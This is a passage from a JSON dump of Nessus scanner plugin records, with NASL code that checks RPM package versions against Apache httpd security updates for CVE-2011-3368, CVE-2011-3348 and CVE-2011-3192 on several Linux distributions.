value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy_ajp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy_scgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_reqtimeout\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_userdir\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-event\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-peruser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-source\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2011\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-base-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-devel-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-htcacheclean-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_authn_dbd-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_cache-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_dav-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_dbd-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_deflate-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_disk_cache-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_file_cache-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_ldap-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_mem_cache-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_proxy-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_proxy_ajp-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_proxy_scgi-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_reqtimeout-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_ssl-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_userdir-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-modules-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-event-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-itk-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-peruser-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-prefork-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mpm-worker-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-source-2.2.15-3.6mdv2010.2\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2011\", reference:\"apache-base-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-devel-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-htcacheclean-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_authn_dbd-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_cache-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_dav-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_dbd-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_deflate-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_disk_cache-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_file_cache-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_ldap-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_mem_cache-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_proxy-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_proxy_ajp-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_proxy_scgi-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_reqtimeout-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_ssl-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mod_userdir-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-modules-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-event-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-itk-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-peruser-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-prefork-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-mpm-worker-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"apache-source-2.2.21-0.4-mdv2011.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T18:30:05", "description": "From Red Hat Security Advisory 2011:1391 :\n\nUpdated httpd packages that fix two security issues and one bug are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly validate the request URI for proxied requests. In certain configurations, if a reverse proxy used the ProxyPassMatch directive, or if it used the RewriteRule directive with the proxy flag, a remote attacker could make the proxy connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to the attacker. (CVE-2011-3368)\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal Server Error' response when processing certain malformed HTTP requests, which caused the back-end server to be marked as failed in configurations where mod_proxy was used in load balancer mode. A remote attacker could cause mod_proxy to not send requests to back-end AJP (Apache JServ Protocol) servers for the retry timeout period or until all back-end servers were marked as failed. (CVE-2011-3348)\n\nRed Hat would like to thank Context Information Security for reporting the CVE-2011-3368 issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update introduced regressions in the way httpd handled certain Range HTTP header values. This update corrects those regressions. (BZ#736592)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon must be restarted for the update to take effect.", "cvss3": {"score": null, "vector": null}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : httpd (ELSA-2011-1391)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3192", "CVE-2011-3348", "CVE-2011-3368"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:httpd", "p-cpe:/a:oracle:linux:httpd-devel", "p-cpe:/a:oracle:linux:httpd-manual", "p-cpe:/a:oracle:linux:httpd-tools", "p-cpe:/a:oracle:linux:mod_ssl", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2011-1391.NASL", "href": "https://www.tenable.com/plugins/nessus/68376", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2011:1391 and \n# Oracle Linux Security Advisory ELSA-2011-1391 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68376);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3348\", \"CVE-2011-3368\");\n script_bugtraq_id(49303, 49616, 49957, 50312);\n script_xref(name:\"RHSA\", value:\"2011:1391\");\n\n script_name(english:\"Oracle Linux 6 : httpd (ELSA-2011-1391)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2011:1391 :\n\nUpdated httpd packages that fix two security issues and one bug are\nnow available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal\nServer Error' response when processing certain malformed HTTP\nrequests, which caused the back-end server to be marked as failed in\nconfigurations where mod_proxy was used in load balancer mode. A\nremote attacker could cause mod_proxy to not send requests to back-end\nAJP (Apache JServ Protocol) servers for the retry timeout period or\nuntil all back-end servers were marked as failed. (CVE-2011-3348)\n\nRed Hat would like to thank Context Information Security for reporting\nthe CVE-2011-3368 issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\nintroduced regressions in the way httpd handled certain Range HTTP\nheader values. This update corrects those regressions. (BZ#736592)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-October/002419.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/09/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"httpd-2.2.15-9.0.1.el6_1.3\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-devel-2.2.15-9.0.1.el6_1.3\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-manual-2.2.15-9.0.1.el6_1.3\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-tools-2.2.15-9.0.1.el6_1.3\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mod_ssl-2.2.15-9.0.1.el6_1.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-tools / mod_ssl\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-27T14:51:11", "description": "The Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly validate the request URI for proxied requests. In certain configurations, if a reverse proxy used the ProxyPassMatch directive, or if it used the RewriteRule directive with the proxy flag, a remote attacker could make the proxy connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to the attacker. (CVE-2011-3368)\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal Server Error' response when processing certain malformed HTTP requests, which caused the back-end server to be marked as failed in configurations where mod_proxy was used in load balancer mode. A remote attacker could cause mod_proxy to not send requests to back-end AJP (Apache JServ Protocol) servers for the retry timeout period or until all back-end servers were marked as failed. (CVE-2011-3348)\n\nThis update also fixes the following bug :\n\n - The fix for CVE-2011-3192 provided by a previous update introduced regressions in the way httpd handled certain Range HTTP header values. This update corrects those regressions.\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon must be restarted for the update to take effect.", "cvss3": {"score": null, "vector": null}, "published": "2012-08-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : httpd on SL6.x i386/x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3192", "CVE-2011-3348", "CVE-2011-3368"], "modified": "2021-01-14T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20111020_HTTPD_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61161", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61161);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3348\", \"CVE-2011-3368\");\n\n script_name(english:\"Scientific Linux Security Update : httpd on SL6.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal\nServer Error' response when processing certain malformed HTTP\nrequests, which caused the back-end server to be marked as failed in\nconfigurations where mod_proxy was used in load balancer mode. A\nremote attacker could cause mod_proxy to not send requests to back-end\nAJP (Apache JServ Protocol) servers for the retry timeout period or\nuntil all back-end servers were marked as failed. (CVE-2011-3348)\n\nThis update also fixes the following bug :\n\n - The fix for CVE-2011-3192 provided by a previous update\n introduced regressions in the way httpd handled certain\n Range HTTP header values. This update corrects those\n regressions.\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1110&L=scientific-linux-errata&T=0&P=2151\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7548291d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"httpd-2.2.15-9.sl6.3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-debuginfo-2.2.15-9.sl6.3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-devel-2.2.15-9.sl6.3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-manual-2.2.15-9.sl6.3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-tools-2.2.15-9.sl6.3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"mod_ssl-2.2.15-9.sl6.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-19T17:20:49", "description": "This update fixes several security issues in the Apache webserver.\n\nThe patch for the ByteRange remote denial of service attack (CVE-2011-3192) was refined and the configuration options used by upstream were added. Introduce new config option: Allow MaxRanges Number of ranges requested, if exceeded, the complete content is served. default: 200 0|unlimited: unlimited none: Range headers are ignored. This option is a backport from 2.2.21.\n\nAlso fixed: CVE-2011-3348: Denial of service in proxy_ajp when using a undefined method.\n\nCVE-2011-3368: Exposure of internal servers via reverse proxy methods with mod_proxy enabled and incorrect Rewrite or Proxy Rules.", "cvss3": {"score": null, "vector": null}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : apache2 (openSUSE-SU-2011:1217-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3192", "CVE-2011-3348", "CVE-2011-3368"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2", "p-cpe:/a:novell:opensuse:apache2-devel", "p-cpe:/a:novell:opensuse:apache2-example-certificates", "p-cpe:/a:novell:opensuse:apache2-example-pages", "p-cpe:/a:novell:opensuse:apache2-itk", "p-cpe:/a:novell:opensuse:apache2-prefork", "p-cpe:/a:novell:opensuse:apache2-utils", "p-cpe:/a:novell:opensuse:apache2-worker", "cpe:/o:novell:opensuse:11.3"], "id": "SUSE_11_3_APACHE2-111026.NASL", "href": "https://www.tenable.com/plugins/nessus/75426", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update apache2-5347.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75426);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3192\", \"CVE-2011-3348\", \"CVE-2011-3368\");\n\n script_name(english:\"openSUSE Security Update : apache2 (openSUSE-SU-2011:1217-1)\");\n script_summary(english:\"Check for the apache2-5347 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes several security issues in the Apache webserver.\n\nThe patch for the ByteRange remote denial of service attack\n(CVE-2011-3192) was refined and the configuration options used by\nupstream were added. Introduce new config option: Allow MaxRanges\nNumber of ranges requested, if exceeded, the complete content is\nserved. default: 200 0|unlimited: unlimited none: Range headers are\nignored. This option is a backport from 2.2.21.\n\nAlso fixed: CVE-2011-3348: Denial of service in proxy_ajp when using a\nundefined method.\n\nCVE-2011-3368: Exposure of internal servers via reverse proxy methods\nwith mod_proxy enabled and incorrect Rewrite or Proxy Rules.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=713966\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=719236\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=722545\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2011-11/msg00004.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-certificates\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", 